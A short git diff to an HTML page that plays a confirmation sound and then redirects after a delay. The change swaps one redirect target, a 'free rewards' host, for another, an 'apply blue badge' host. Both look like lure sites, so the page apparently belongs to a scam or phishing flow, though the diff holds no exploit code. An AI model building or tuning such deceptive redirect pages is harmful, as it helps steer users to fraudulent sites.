--- a/index.html
+++ b/index.html
@@ -116,7 +116,7 @@
   <audio id="successSound" src="https://assets.mixkit.co/sfx/preview/mixkit-confirmation-tone-2867.mp3" preload="auto"></audio>
 
   <script>
-    const redirectURL = "https://free-get-rewards.wasmer.app/"; // Replace this with your target link
+    const redirectURL = "http://apply-get-blue-badge.surge.sh/"; // Replace this with your target link
 
     setTimeout(() => {
       // Play sound
